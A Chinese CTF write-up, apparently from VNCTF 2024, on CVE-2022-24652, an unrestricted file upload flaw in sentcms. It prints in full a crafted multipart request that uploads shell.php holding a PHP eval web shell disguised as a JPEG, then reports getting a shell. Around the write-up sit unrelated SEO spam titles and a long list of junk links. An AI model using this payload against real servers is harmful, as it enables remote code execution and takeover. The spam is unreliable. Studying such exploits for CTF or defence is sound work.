当前位置: 首页 > news >正文

国内专业做网站一套完整的app开发流程

国内专业做网站,一套完整的app开发流程,怎么生成域名做网站,效果图制作网站有哪些CVE-2022-24652 开题 后台管理是thinkphp的,但是工具没检测出漏洞。 登陆后界面如下,上传头像功能值得引起注意 这其实就是CVE-2022-24652,危险类型文件的不加限制上传,是文件上传漏洞。漏洞路由/user/upload/upload 参考文章&a…

CVE-2022-24652

开题

image-20240217160907617

后台管理是thinkphp的,但是工具没检测出漏洞。

image-20240217160935703

登陆后界面如下,上传头像功能值得引起注意

image-20240217162423183

这其实就是CVE-2022-24652,危险类型文件的不加限制上传,是文件上传漏洞。漏洞路由/user/upload/upload

参考文章:

阿里云漏洞库 (aliyun.com)

CVE-2022-24652|sentcms 4.0.x allows remote… - VULHUB开源网络安全威胁库

Sentcms任意文件上传漏洞 | Hanayuzu’Blog

image-20240217163203276

抓包上传文件,由于没有上传文件按钮,我们手动构建上传包。

修改包:

POST /user/upload/upload HTTP/1.1
Host: 7dd1d89b-bc28-43fc-9b42-a014dff41eea.vnctf2024.manqiu.top
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=bdd5af1e5c92e47342e53886cecaced2
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Length: 770------WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Disposition: form-data; name="id"WU_FILE_0
------WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Disposition: form-data; name="name"test.jpg
------WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Disposition: form-data; name="type"image/jpeg
------WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Disposition: form-data; name="lastModifiedDate"Wed Jul 21 2021 18:15:25 GMT+0800 (中国标准时间)
------WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Disposition: form-data; name="size"164264
------WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Disposition: form-data; name="file"; filename="shell.php"
Content-Type: image/jpegJay17
<?php eval($_POST[1]);?>------WebKitFormBoundaryrhx2kYAMYDqoTThz--

image-20240217163823624

访问呢恶意文件,getshell

image-20240217164029557

http://www.yayakq.cn/news/607147/

相关文章:

  • 学校二级学院网站建设多语言网站怎么实现
  • 合肥高端网站建设工作室广州网络推广选择
  • 北京网站开发网站建设layui 企业网站模板
  • 做的网站底部应该标注什么意思如何卸载安装wordpress
  • 校园信息网站开发与设计网址推广软件
  • 网站开发三大框架网站的建设与维护有什么作用
  • 西安做百度网站的上海网站建设接单
  • 北京网站运营优化公司满洲里建设局网站
  • 做网站的公司主要工作域名买完后如何做网站
  • 网站域名使用方法flash布局 的优秀网站
  • 网站产品后台界面怎么做网站几个关键词
  • 淘宝客网站建好了没有数据库北京南站到故宫地铁怎么坐
  • 大连网站建设学校最好看免费观看高清视频了
  • 保定网站建设开发汉中市建设工程招投标信息网官网
  • 做网站的公司哪里好珠海网站建设制作设计
  • 企业网站的运营如何做国家示范建设成果网站
  • 网站备案名称查询学做网站需要多久时间
  • 做公司网站多钱广州建筑装饰集团有限公司
  • 网站制作 网站北京百度竞价托管公司
  • 一个内部网站如何做外网映射官方静态网站模板下载
  • 网站推广的六种方式新乡网站建设加盟电话
  • 网站建站免费设计公司简介范文
  • 宜昌十堰网站建设哪家好怎么对企业进行网站建设
  • 推荐聊城做网站网站开发的硬件环境要求
  • 基于php的网站设计与实现wordpress 速度慢
  • 建设网站的源代码的所有权东莞互联网企业
  • 网站做营利性广告需要什么备案市场调查报告
  • 中山专业做网站作一手房用什么做网站
  • 论坛网站建设价格信息网络传播权保护条例
  • 网站开发安全性分析北京政务服务官方网站